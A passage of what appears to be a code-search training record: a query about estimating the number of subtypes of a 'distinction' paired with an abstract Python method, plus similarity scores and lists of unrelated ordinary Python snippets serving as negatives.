center_6['x'] = 0\n center_6['y'] = 0\n center_6['z'] = 0\n center_4 = {}\n center_4['x'] = 0\n center_4['y'] = 0\n center_4['z'] = 0\n for atom in ring:\n center_6['x'] += atom.x\n center_6['y'] += atom.y\n center_6['z'] += atom.z\n if ((atom != random_atom_1) and (atom != random_atom_2)):\n center_4['x'] += atom.x\n center_4['y'] += atom.y\n center_4['z'] += atom.z\n center_6['x'] /= 6\n center_6['y'] /= 6\n center_6['z'] /= 6\n center_4['x'] /= 4\n center_4['y'] /= 4\n center_4['z'] /= 4\n N_pyrrolic -= 1\n p = 0.6\n limit = 0.3\n if ((-limit < center_4['x'] - center_6['x'] < limit) and (-limit < center_4['y'] - center_6['y'] < limit)): \n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'])), float(\"{0:.3f}\".format(center_6['y'])), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((-limit < center_4['x'] - center_6['x'] < limit) and (center_4['y'] - center_6['y'] < -limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'])), float(\"{0:.3f}\".format(center_6['y'] + p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((-limit < center_4['x'] - center_6['x'] < limit) and (center_4['y'] - center_6['y'] > limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'])), float(\"{0:.3f}\".format(center_6['y'] - p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] < -limit) and (-limit < center_4['y'] - center_6['y'] < limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] + p)), float(\"{0:.3f}\".format(center_6['y'])), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] < -limit) and (center_4['y'] - center_6['y'] < -limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] + p)), float(\"{0:.3f}\".format(center_6['y'] + p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] < -limit) and (center_4['y'] - center_6['y'] > limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] + p)), float(\"{0:.3f}\".format(center_6['y'] - p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] > limit) and (-limit < center_4['y'] - center_6['y'] < limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] - p)), float(\"{0:.3f}\".format(center_6['y'])), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] > limit) and (center_4['y'] - center_6['y'] < -limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] - p)), float(\"{0:.3f}\".format(center_6['y'] + p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n elif ((center_4['x'] - center_6['x'] > limit) and (center_4['y'] - center_6['y'] > limit)):\n N = Atom(random_atom_1.atom_number, \"N1\", \"N2N\", str(pyrrolic - N_pyrrolic), float(\"{0:.3f}\".format(center_6['x'] - p)), float(\"{0:.3f}\".format(center_6['y'] - p/2)), float(\"{0:.3f}\".format(center_6['z']))) \n for ring in rings:\n if (random_atom_1 in ring):\n for atom in ring:\n try:\n map_3.remove(atom)\n except:\n pass\n try:\n map_2.remove(atom)\n except:\n 
pass\n try:\n map_2n.remove(atom)\n except:\n pass\n for mol in identify_bonds(atom, atom_list):\n try:\n map_2n.remove(mol[0])\n except:\n pass\n try:\n atom_list.remove(random_atom_1)\n atom_list.remove(random_atom_2)\n except:\n pass\n atom_list.append(N)\n else:\n attempt -= 1\n attempt -= 1\n writepdb(atom_list, filename1)\n print(\"done.\")\n return 'done.'",
"def get_dominant_graph(msm, with_comm_classes=False):\n\n g = AGraph(strict=False, directed=True)\n\n g.graph_attr.update(size=\"7.75, 10.25\")\n g.graph_attr.update(dpi=\"300\")\n for i in range(msm.num_nodes):\n if(i in msm.a):\n g.add_node(i, color = 'blue')\n elif(i in msm.b):\n g.add_node(i, color = 'green')\n elif(i in msm.dominant_pathway):\n g.add_node(i, color= 'red')\n else:\n g.add_node(i)\n\n if with_comm_classes:\n comm_classes = msm.communication_classes\n\n for (i, comm) in enumerate(comm_classes):\n g.add_subgraph(nbunch=comm, name='cluster%d' % i,\n style='rounded, dotted',\n color='lightgrey',\n label='<<B>Communication class %d</B>>' % (i + 1))\n\n for from_node in range(msm.num_nodes):\n for to_node in get_adjacent_nodes(msm, from_node, discard_self=False):\n if msm.effective_probability_current[from_node, to_node] != 0.0:\n label = '%.2E' % msm.effective_probability_current[from_node, to_node]\n if([from_node, to_node] in msm.dominant_pathway_format):\n g.add_edge(from_node, to_node, color='red' , label=label)\n else:\n \tg.add_edge(from_node, to_node, label=label)\n\n return g",
"def __init__(self, graph: ghidra.graph.GImplicitDirectedGraph):\n ...",
"def generate_random_request(constr=None):\n constr = constr or dict()\n copula_spec = dict()\n\n # Handle copula version\n if 'version' in constr.keys():\n version = constr['version']\n else:\n version = np.random.choice(['scaled_archimedean', 'nonstationary', 'warmglow'])\n copula_spec['version'] = version\n\n # Handle copula spec\n if version in ['scaled_archimedean']:\n copula_spec['scaled_archimedean'] = dict()\n copula_spec['scaled_archimedean']['version'] = 'scaled_archimedean'\n\n generating_function = np.random.choice([1])\n marginals = np.random.choice(['power', 'exponential'], 2)\n\n copula_spec['scaled_archimedean']['generating_function'] = generating_function\n copula_spec['scaled_archimedean']['marginals'] = marginals\n copula_spec['scaled_archimedean']['bounds'] = np.random.uniform(0.1, 10, 2)\n copula_spec['scaled_archimedean']['u'] = np.random.uniform(0.01, 0.99, 2)\n copula_spec['scaled_archimedean']['delta'] = np.random.uniform(0.001, 5)\n copula_spec['scaled_archimedean']['r'] = np.random.uniform(0.001, 5, 2)\n copula_spec['scaled_archimedean']['a'] = np.random.uniform(0.01, 10)\n copula_spec['scaled_archimedean']['b'] = np.random.normal()\n\n # We want to be able to request some constraint special cases.\n if 'r' in constr.keys():\n copula_spec['r'] = constr['r']\n if 'bounds' in constr.keys():\n copula_spec['scaled_archimedean']['bounds'] = constr['bounds']\n if 'a' in constr.keys():\n copula_spec['scaled_archimedean']['a'] = constr['a']\n if 'b' in constr.keys():\n copula_spec['scaled_archimedean']['b'] = constr['b']\n if 'u' in constr.keys():\n copula_spec['scaled_archimedean']['u'] = constr['u']\n if 'delta' in constr.keys():\n copula_spec['scaled_archimedean']['delta'] = constr['delta']\n\n if version in ['nonstationary', 'warmglow']:\n copula_spec[version] = dict()\n copula_spec[version]['version'] = version\n copula_spec[version]['alpha'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['beta'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['gamma'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['y_scale'] = np.random.uniform(0.1, 5.0)\n copula_spec[version]['discount_factors'] = \\\n {t: np.random.uniform(0.2, 1.0) for t in [0, 1, 3, 6, 12, 24]}\n\n random_weights = {t: np.random.uniform(0.1, 1.0) for t in [0, 1, 3, 6, 12, 24]}\n\n # Optional arguments\n copula_spec[version]['unrestricted_weights'] = \\\n np.random.choice([random_weights, None], p=[0.3, 0.7])\n copula_spec[version]['discounting'] = \\\n np.random.choice([None, 'hyperbolic', 'exponential'], p=[0.6, 0.2, 0.2])\n\n # Some version-specific arguments\n if version in [\"warmglow\"]:\n copula_spec[version]['warmglow_type'] = \\\n np.random.choice([\"constant\", \"linear\"], p=[0.5, 0.5])\n\n # These are derived attributes and thus need to be created at the very end.\n is_normalized = np.random.choice([True, False])\n if is_normalized:\n x, y = np.random.uniform(0, 1, 2)\n else:\n if version in ['scaled_archimedean']:\n bounds = copula_spec['scaled_archimedean']['bounds']\n x = np.random.uniform(0, bounds[0])\n y = np.random.uniform(0, bounds[1])\n elif version in ['nonstationary', 'warmglow']:\n x = np.random.uniform(0, 10)\n y = np.random.uniform(0, 10)\n else:\n raise NotImplementedError\n\n return x, y, is_normalized, copula_spec",
"def isomorphic(graph1, graph2):\r\n\r\n gd1 = _TripleCanonicalizer(graph1).to_hash()\r\n gd2 = _TripleCanonicalizer(graph2).to_hash()\r\n return gd1 == gd2",
"def get_graph_tuple(nodes, globals=None):\n\tnodes_shape = nodes.shape\n\tbatch_size = nodes_shape[0]\n\tnum_nodes = tf.ones([batch_size], dtype=tf.int32)\n\tnum_edges = tf.ones([batch_size], dtype=tf.int32)\n\t# defining num_nodes & num_edges for each sample in a batch of input graphs\n\tb_num_nodes = nodes_shape[1]*num_nodes\n\tb_num_edges = (nodes_shape[1]**2)*num_edges\n\t# rehaping (b, num_nodes, dims) -> (b*num_nodes, dims)\n\tnodes = tf.reshape(nodes, [nodes_shape[0] * nodes_shape[1], nodes_shape[2]])\n\tif globals is not None:\n\t\tglobals_shape = globals.shape\n\t\tglobals = tf.reshape(globals, [globals_shape[0] * globals_shape[1],\n\t\t\t\t\t\t\tglobals_shape[2]])\n\t\tgraph_tuple = graphs.GraphsTuple(nodes=nodes, globals=globals)\n\telse:\n\t\tgraph_tuple = graphs.GraphsTuple(nodes=nodes, globals=None, edges=None,\n\t\t\t\t\t\t\t\t\t\t n_node=b_num_nodes, n_edge=b_num_edges,\n\t\t\t\t\t\t\t\t\t\t senders=None, receivers=None)\n\treturn graph_tuple",
"def generateCombos(vars,constants):\n # SUPER NOT GENERALIZED---TOO LATE AT NIGHT FOR ME TO DO RECURSIVE ALGORITHMS\n assert len(vars) == 2 and len(constants) == 2\n combs = []\n for c1 in constants:\n for c2 in constants:\n combs.append(Grounding([(vars[0], c1), (vars[1], c2)]))\n return combs"
] | [
"0.6162866",
"0.60737395",
"0.56084675",
"0.5604049",
"0.5572062",
"0.55707884",
"0.5547834",
"0.5473386",
"0.54535896",
"0.54377645",
"0.5403645",
"0.5399105",
"0.53836566",
"0.5325518",
"0.5313336",
"0.5309223",
"0.5285266",
"0.52835023",
"0.5281857",
"0.52793276",
"0.52750707",
"0.5272496",
"0.5256191",
"0.5253513",
"0.5253208",
"0.5230315",
"0.5202073",
"0.5174802",
"0.5167406",
"0.51576334",
"0.513413",
"0.5124367",
"0.51200587",
"0.5099855",
"0.5095381",
"0.5083169",
"0.5062148",
"0.50387913",
"0.50376195",
"0.50370264",
"0.5020031",
"0.501621",
"0.50077236",
"0.5005994",
"0.50015634",
"0.49984843",
"0.49979436",
"0.49914777",
"0.49897304",
"0.4946081",
"0.49457794",
"0.4942098",
"0.4932983",
"0.4930739",
"0.4920656",
"0.49172986",
"0.49076685",
"0.48978686",
"0.48968446",
"0.48921824",
"0.48869208",
"0.48831293",
"0.4870421",
"0.4870017",
"0.4859651",
"0.48536807",
"0.48408657",
"0.48312768",
"0.4814618",
"0.48119724",
"0.48085365",
"0.4804875",
"0.48047003",
"0.47985333",
"0.47965947",
"0.47914183",
"0.47908562",
"0.47900093",
"0.47834435",
"0.47826767",
"0.47793084",
"0.4777522",
"0.47770295",
"0.47753128",
"0.47728923",
"0.4767957",
"0.475829",
"0.4753831",
"0.47372544",
"0.47361213",
"0.47304514",
"0.47291154",
"0.47183728",
"0.47182888",
"0.47174814",
"0.47170013",
"0.47163576",
"0.4714001",
"0.47081676",
"0.47052547"
] | 0.7116983 | 0 |
Get an estimate of the number of different subtypes for this distinction. This is used to estimate a PDF for randomly sampling the distinction space. Examine the code of other distinctions to get a feel for how things are estimated. | def getNumberOfSubtypes(config, low_estimate=True):
raise AbstractMethodException(Distinction) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def getNumberOfBaseDistinctionsNeeded():\n\n raise AbstractMethodException(Distinction)",
"def findAtypicalTerms(self):\n self.atypicalTermsDict = collections.OrderedDict()\n distanceList = list()\n distance = 0\n for key in self.summaryFilteredDict:\n partitionName = str(key).split(\" :\")[0]\n partition = voc.getPartition(partitionName)\n modNames = partition.getModNames()\n currentModality = str(key).split(\": \")[1]\n indexCurrentModality = modNames.index(currentModality)\n coverCurrentModality = self.getCoverFromModalityInDictionnary(self.summaryFilteredDict,partitionName + \" : \" + currentModality) #cover(v',R)\n if coverCurrentModality > 0:\n for modality in partition.getModalities():\n coverModality = self.getCoverFromModalityInDictionnary(self.summaryFilteredDict,partitionName + \" : \" + modality.getName()) # cover(v,R)\n if modality.isTrapeziumModality():\n indexModality = modNames.index(modality.getName())\n distance = abs(indexCurrentModality - indexModality) / (partition.getNbModalities() - 1) #d(v,v')\n elif modality.isEnumModality():\n if (modality.getName() == currentModality):\n distance = 0\n else:\n distance = 1\n distanceList.append(min(distance, 1 - coverCurrentModality, coverModality)) # min(d(v,v'),cover(v,R),1-cover(v',R))\n self.atypicalTermsDict[partitionName + \" : \" + currentModality] = max(distanceList) # D(v',R)\n distanceList = list()",
"def test_get_tax_return_frequencies(self):\n pass",
"def get_type_stats(self):\n if not self.fitted:\n raise ValueError(\"Vocabulary hasn't been computed yet\")\n\n total_types = len(self.freqs)\n known_types = len(self) - len(self.reserved)\n return known_types, total_types, known_types / total_types",
"def specificity(self):\n result = 0\n for focal, value in self.items():\n if focal.cardinal > 0:\n result += value / focal.cardinal\n return round(result, 6)",
"def prob_t_N(genotype, base):\n cnter = Counter(genotype)\n return cnter.get(base, 0) * 1/len(genotype)",
"def get_num_classes(self):",
"def calculate_size(self, num_dots):\n self.objects = num_dots\n square = sqrt(self.objects)\n if self.objects % square == 0:\n return int(square), int(square)\n else:\n denom = self.objects // sqrt(self.objects)\n while self.objects % denom != 0:\n denom -= 1\n return int(denom), int(self.objects // denom)",
"def subtype_counts(node_set, G, log=False):\n subtypes = Counter()\n for n in node_set:\n subtype = G.node[n]['subtype']\n subtypes[subtype] += 1\n\n if log:\n for k, v in subtypes.items():\n subtypes[k] = np.log10(v)\n \n return subtypes",
"def _calcTypeDist(self, uSignType, uPassiveShape,\n dbSignType, dbPassiveShape):\n if dbSignType != uSignType:\n # different type\n typeDist = 1\n else:\n # the same type\n if dbSignType == 'passive hand':\n if dbPassiveShape == uPassiveShape:\n # the same shape\n typeDist = 0\n else:\n # different shape\n typeDist = 0.5\n else:\n # the same type other than 'passive hand'\n typeDist = 0\n return typeDist",
"def getDensityEstimate(self):\n return self.density",
"def class_size(self):\n\t\tif self.subject.count()==0:\n\t\t\treturn student.objects.all().filter(reg=self).count()\n\t\telse:\n\t\t\treturn self.grade_set.all().distinct().count()",
"def create_subspace_preference_dimensionality(self):\n # For each point compute number of dimensions that have a lower variance then delta\n spd = np.count_nonzero(self.attribute_variances < self.delta, axis=1)\n return spd",
"def N(self) -> int:\n n_types = len(self)\n return n_types",
"def generatePDI(self,level='species',type='richness'):\n if type == 'richness':\n import biodiversity.richness as rich\n pdi = rich(self)\n try:\n return pdi[level]\n except:\n logger.error(\"[biospatial.gbif.taxonomy.distanceToTree] level selected non existent (used %s)\" %level)",
"def getDimensionality(self):\n dimensionality = self._distribution.returnDimensionality()\n return dimensionality",
"def n(self):\n return len(self.genotypes)",
"def num_depth(self):\n return len(self._sizes) + len(self._ratios) - 1",
"def target_pdf(p, disttype):\n me, cov = target_params(disttype)\n if disttype == 'round' or disttype == 'correlated':\n prob = multivariate_normal.pdf(p, mean=me, cov=cov)\n elif disttype == 'bimodal' or disttype == 'close_bimodal':\n prob0 = multivariate_normal.pdf(p, mean=me[0], cov=cov)\n prob1 = multivariate_normal.pdf(p, mean=me[1], cov=cov)\n prob = max([prob0, prob1]) \n \n return prob",
"def determine_size(self):\n size = np.inf\n while size >= self.n:\n size = np.random.pareto(0.2)\n size = int(math.ceil(size))\n return size",
"def denominator(self, ???):",
"def data_type_ratio(self):\n if self.sample_size:\n return float(self.match_count) / self.sample_size\n return None",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n else:\n components = []\n multiplicities = []\n for x in self.irreducible_components():\n if components.count(x) == 0:\n components.append(x)\n multiplicities.append(1)\n else:\n y = components.index(x)\n multiplicities[y] = multiplicities[y]+1\n\n sizes = [ x.class_size() for x in components ]\n if NotImplemented in sizes:\n print(\"Size unknown\")\n return NotImplemented\n else:\n return prod( [binomial(sizes[i]+multiplicities[i]-1,\n multiplicities[i] ) for i in range (0,len(sizes))])",
"def measures(self, actual, top, nSugg):\n m2 = 0.0\n m3 = 0.0\n for categorySug, count in top:\n if categorySug in actual:\n m2 += 1.0\n else:\n for cR in actual:\n if self.getFatherSon(cR, categorySug) != None:\n m3 += 0.5\n elif self.getBrothers(cR, categorySug) != None:\n m3 += 0.25\n m3 /= len(actual)\n m2 /= nSugg\n m3 = m2 + m3 / nSugg\n return 1 if m2 > 0 else 0, m2, m3",
"def total_sdram_requirements(self):",
"def top_dimensionality(self):\n return self._vocab_size",
"def subtype_occurences(self):\n\n subtype_counts = Counter()\n\n for seqkey,seqs in self.seqs.iteritems():\n for seq,seqentry in seqs.iteritems():\n\n subtype_counts[seqentry['subtype']] += 1\n\n return subtype_counts",
"def getDistType(self):\n return self.distType",
"def get_utilization(self):\n child_prefixes = Prefix.objects.filter(prefix__net_contained_or_equal=str(self.prefix))\n # Remove overlapping prefixes from list of children\n networks = cidr_merge([c.prefix for c in child_prefixes])\n children_size = float(0)\n for p in networks:\n children_size += p.size\n return int(children_size / self.prefix.size * 100)",
"def mutual_info_score(self):\n _, _, I_CK = self._entropies()\n return I_CK / self.grand_total",
"def __len__(self) -> int:\n\n length = self.n_classes * 100\n\n return length",
"def get_ndof(model: BDF, subcase: Subcase) -> Tuple[int, int, int]:\n ndof_per_grid = 6\n if 'HEAT' in subcase:\n ndof_per_grid = 1\n ngrid = model.card_count['GRID'] if 'GRID' in model.card_count else 0\n nspoint = len(model.spoints) # if 'SPOINT' in model.card_count else 0\n nepoint = len(model.epoints) # if 'EPOINT' in model.card_count else 0\n ndof = ngrid * ndof_per_grid + nspoint + nepoint\n #print(f'ngrid={ngrid} nspoint={nspoint}')\n assert ndof > 0, model.card_count\n return ngrid, ndof_per_grid, ndof",
"def test_for_arbitrarily_complicated_substance():\n verify_atomic_weight_for_substance(\"Al4O2H2\", 141.94015428)",
"def __repr__(self):\r\n return self.get_distribution_type()",
"def evaluate_dep_type_sets():\n strategies = {\n 'defensive': ['agent', 'advcl', 'parataxis'],\n 'aggressive': ['agent', 'advcl', 'parataxis', 'dep', 'aux', 'ccomp', 'xcomp', 'dobj', 'pobj', 'nsubj', 'nsubjpass', 'cc', 'abbrev', 'purpcl', 'predet', 'preconj', 'advmod', 'neg', 'rcmod', 'tmod', 'poss', 'prepc'],\n 'compromise_1': ['agent', 'advcl', 'parataxis', 'aux', 'xcomp', 'pobj', 'nsubjpass', 'cc', 'abbrev', 'purpcl', 'predet', 'neg', 'tmod', 'poss', 'prepc'],\n 'compromise_2': ['agent', 'advcl', 'parataxis', 'aux', 'xcomp', 'pobj', 'nsubjpass', 'cc', 'abbrev', 'purpcl', 'predet', 'neg', 'tmod', 'poss', 'prepc', 'attr', 'csubj', 'csubjpass', 'number', 'possessive', 'punct', 'ref']\n }\n results = {'classification':{}, 'retrieval':{}}\n\n print '------ CLASSIFICATION EVALUATION --------'\n print '> Reading cases..'\n descriptions_path = '../data/tasa/TASA900_dependencies'\n texts, labels = data.read_files(descriptions_path)\n print '> Creating representations..'\n rep = {}\n for strategy in strategies:\n rep[strategy] = []\n metric = graph.GraphMetrics.CLOSENESS\n for i, text in enumerate(texts):\n if i%10==0: print ' ',str(i)+'/'+str(len(texts))\n for strategy in strategies:\n g = graph_representation.construct_dependency_network(text, exclude=strategies[strategy])\n d = graph_representation.graph_to_dict(g, metric)\n rep[strategy].append(d)\n g = None # just to make sure. I don't trust this damn garbage collector...\n for strategy in strategies:\n rep[strategy] = graph_representation.dicts_to_vectors(rep[strategy])\n print '> Evaluating..'\n for strategy in strategies:\n score = evaluation.evaluate_classification(rep[strategy], labels)\n print ' ', strategy, score\n results['classification'][strategy] = score\n\n data.pickle_to_file(results, 'output/dependencies/types_set_eval_tmp')\n\n print '------ RETRIEVAL EVALUATION --------'\n print '> Reading cases..'\n descriptions_path = '../data/air/problem_descriptions_dependencies'\n description_texts, labels = data.read_files(descriptions_path)\n solutions_path = '../data/air/solutions_preprocessed'\n solution_texts, labels = data.read_files(solutions_path)\n solution_vectors = freq_representation.text_to_vector(solution_texts, freq_representation.FrequencyMetrics.TF_IDF)\n print '> Creating representations..'\n rep = {}\n for strategy in strategies:\n rep[strategy] = []\n metric = graph.GraphMetrics.EIGENVECTOR\n for i, text in enumerate(description_texts):\n if i%1==0: print ' ',str(i)+'/'+str(len(description_texts))\n full_graph = graph_representation.construct_dependency_network(text)\n for strategy in strategies:\n g = graph_representation.construct_dependency_network(text, exclude=strategies[strategy])\n d = graph_representation.graph_to_dict(g, metric)\n rep[strategy].append(d)\n g = None # just to make sure..\n full_graph = None\n #~ if i%100==0: data.pickle_to_file(rep, 'output/dependencies/types_eval_rep_'+str(i))\n for strategy in strategies:\n rep[strategy] = graph_representation.dicts_to_vectors(rep[strategy])\n print '> Evaluating..'\n for strategy in strategies:\n score = evaluation.evaluate_retrieval(rep[strategy], solution_vectors)\n print ' ', strategy, score\n results['retrieval'][strategy] = score\n\n pp.pprint(results)\n data.pickle_to_file(results, 'output/dependencies/types_set_eval')\n\n return results",
"def totalize_natures(sv):\r\n tot=0 \r\n for nod in sv.Object.values():\r\n tot+=len(nod.nature)\r\n return tot",
"def num_depth(self):\n if self._index == 0:\n return len(self._ratios)\n else:\n return len(self._sizes) + len(self._ratios) - 1",
"def my_dimension(self) -> Nat:\n my_part = self.my_diagram.as_list()\n sum_phat_sq = sum((z*(2*i+1) for (i, z) in enumerate(my_part)))\n dimension = 0\n num_odd_parts = sum((z % 2 for z in my_part))\n if self.my_type is LieType.A:\n dimension = (self.lie_rank+1)**2 - sum_phat_sq\n elif self.my_type is LieType.D:\n dimension = 2*(self.lie_rank**2) - self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.B:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.C:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 - num_odd_parts//2\n else:\n raise ValueError(\n \"Lie type must be one of the 4 classical families\")\n return dimension",
"def getNDF(self):\n\t\tNDF = 0\n\t\tfor s in range(self.nSect):\n\t\t\tif not s in self.funcs:\n\t\t\t\tcontinue\n\t\t\tfor i,b in enumerate(range(self.borders[s],self.borders[s+1])):\n\t\t\t\tif self.hasMassRange:\n\t\t\t\t\tif s in self.massRanges:\n\t\t\t\t\t\tbinCenterMass = self.binCenters[b]\n\t\t\t\t\t\tif binCenterMass < self.massRanges[s][0] or binCenterMass >= self.massRanges[s][1]:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\tNDF += 2\n\t\treturn (NDF, 2*self.nZero, 2*self.nFunc, self.nPar)",
"def size(self):",
"def prob(throw, n, d=6, type='classical'):\n count = 0\n table = throw_table(n, d, type)\n for t in table:\n if sum(t) == throw:\n count += 1\n \n return float(count)/len(table)",
"def count_vario(dist_param, picker_param):\n orig = '/home/zby/MAGISTERKA/MGR/results/oryginal.clustered.t'\n cl_orig = read_clustered(orig)\n name_tag = ''\n ndist = dist_param[1:]\n npick = picker_param[1:]\n for index in drange(5, 20, 0.5):\n name_tag = \"{}_{}_{}\".format(index, npick, ndist)\n try:\n clust2 = read_clustered(tfidf_name('merged.stem{}.stop.clustered.t', name_tag))\n except:\n print(\"no data for {}\".format(name_tag))\n continue\n var, norm = variation_of_information(cl_orig, clust2)\n print(\" {} VOI is {}\".format(name_tag, norm))",
"def DAM_class_level(self, class_entity: und.Ent):\n if \"Interface\" in class_entity.kindname():\n return 2.0\n\n private_variables = len(class_entity.ents(\"Define\", \"Java Variable Private Member\"))\n protected_variables = len(class_entity.ents(\"Define\", \"Java Variable Protected Member\"))\n default_variables = len(class_entity.ents(\"Define\", \"Java Variable Default Member\"))\n public_variables = len(class_entity.ents(\"Define\", \"Java Variable Public Member\"))\n\n try:\n enum_ = private_variables + protected_variables\n denum_ = private_variables + protected_variables + default_variables + public_variables\n ratio = enum_ / denum_\n except ZeroDivisionError:\n # logger.error('ZeroDivisionError in computing QMOOD DAM metric.')\n ratio = 2.0\n return 1. + ratio",
"def calc_el_dem_ap(nb_occ, el_random, type):\n\n assert nb_occ > 0\n assert nb_occ <= 5, 'Number of occupants cannot exceed 5 per ap.'\n assert type in ['sfh', 'mfh']\n\n if el_random:\n # Choose first entry of random sample list\n el_dem = usunc.calc_sampling_el_demand_per_apartment(\n nb_samples=1,\n nb_persons=nb_occ,\n type=type)[0]\n else:\n # Choose average value depending on nb_occ\n # Class D without hot water (Stromspiegel 2017)\n dict_sfh = {1: 2500,\n 2: 3200,\n 3: 3900,\n 4: 4200,\n 5: 5400}\n\n dict_mfh = {1: 1500,\n 2: 2200,\n 3: 2800,\n 4: 3200,\n 5: 4000}\n\n if type == 'sfh':\n el_dem = dict_sfh[nb_occ]\n elif type == 'mfh':\n el_dem = dict_mfh[nb_occ]\n\n return el_dem",
"def test_get_tax_return_frequencies_key(self):\n pass",
"def size(cls):\n return (cls.num_properties()*2 + 2)",
"def test_count_genomic_types(self):\n \n result, bed_result = parse_AS_STRUCTURE_dict(\"test\", clipper.test_dir())\n result = count_genomic_types(result)\n \n self.assertDictEqual(result, {\"CE:\" : 14})",
"def compute_statistics(self):",
"def get_N_teachers(school_type, N_classes):\n\tteachers = {\n\t\t'primary':N_classes + int(N_classes / 2),\n\t\t'primary_dc':N_classes * 2,\n\t\t'lower_secondary':int(N_classes * 2.5),\n\t\t'lower_secondary_dc':N_classes * 3,\n\t\t'upper_secondary':int(N_classes * 2.85),\n\t\t'secondary':int(N_classes * 2.5),\n\t\t'secondary_dc':int(N_classes * 2.5)\n\t}\n\treturn teachers[school_type]",
"def __len__(self):\n return sum(self.size_freqs.values())",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def variations():",
"def N(self):\n return self.get_dof()",
"def get_length_itertools(iter_type, iter_obj, iter_size):\n\n candidates = len(iter_obj)\n if 'permutation' in iter_type:\n total = 1\n for i in range(iter_size):\n total *= (candidates - i)\n elif 'product' in iter_type:\n total = candidates ** iter_size\n elif 'combination' in iter_type:\n total = binomail(candidates, iter_size)\n return total",
"def get_importance(self, key, value, depth):\n multiplier = 0.8 ** depth if depth > 1 else 1.0\n base = 0.0\n if key in ['condition', 'symptom', 'disease', 'treatment']:\n base += 5\n elif key in ['gender', 'age'] or 'location' in key:\n base += 4\n elif 'condition' in key or 'symptom' in key or 'disease' in key or 'treatment' in key:\n base += 3\n else:\n base += 2\n return multiplier * base",
"def ANA(self):\n MITs = []\n dbx: und.Db = und.open(self.udb_path)\n filter2 = \"Java Class ~Unresolved ~Unknown ~TypeVariable ~Anonymous ~Enum, Java Interface\"\n known_class_entities = dbx.ents(filter2)\n\n for class_entity in known_class_entities:\n if \"Interface\" in class_entity.kindname():\n continue\n mit = class_entity.metric(['MaxInheritanceTree'])['MaxInheritanceTree']\n MITs.append(mit)\n\n dbx.close()\n return sum(MITs) / len(MITs) if len(MITs) > 0 else 0.",
"def _nbytes(self, deep: bool = False) -> int:\n # for implementations with no useful getsizeof (PyPy)\n objsize = 24\n\n level_nbytes = sum(i.memory_usage(deep=deep) for i in self.levels)\n label_nbytes = sum(i.nbytes for i in self.codes)\n names_nbytes = sum(getsizeof(i, objsize) for i in self.names)\n result = level_nbytes + label_nbytes + names_nbytes\n\n # include our engine hashtable\n result += self._engine.sizeof(deep=deep)\n return result",
"def GOAL_TOTAL() -> int:\n return 21",
"def specificity(confusion):\n classes = range(confusion.shape[0])\n num = (np.sum(confusion[classes]) - np.sum(confusion[classes], axis=0) -\n np.sum(confusion[classes], axis=1) + confusion[classes, classes])\n den = ((np.ones(confusion.shape[0]) * np.sum(confusion[classes])) -\n np.sum(confusion[classes], axis=1))\n return num / den",
"def n(self):\n raise NotImplementedError",
"def information(self, fdist):\n freq = fdist.get(self.string)\n if not freq:\n freq = 0\n return 1 - (log(freq + 1) / log(fdist.N() + 1))",
"def get_effect_size(df1, df2):\n p1 = np.mean(df1)\n p2 = np.mean(df2)\n print(\"Effect size: {}\".format(round(proportion_effectsize(p1, p2),4)))",
"def test_subsample_taxonomy(self):\n basic_test_runner(self, 'taxonomy', nrows=6, niter=3, normalize='subsample')",
"def sample_representations_shape(self):\n return (N_DIMS_PER_REP,)",
"def denominator(self):\n return 1",
"def solve_sample_size(self):\n e = self.normalized_effect_size()\n df_denom_solve = FTestPower().solve_power(\n effect_size=e\n ,df_num=None\n ,df_denom=self.df_num\n ,alpha=self.alpha\n ,power=(1 - self.beta)\n ,ncc=1\n )\n n = int(df_denom_solve + len(self.test_splits))\n return n",
"def getDimensionality(self):\n return self.dimensionality",
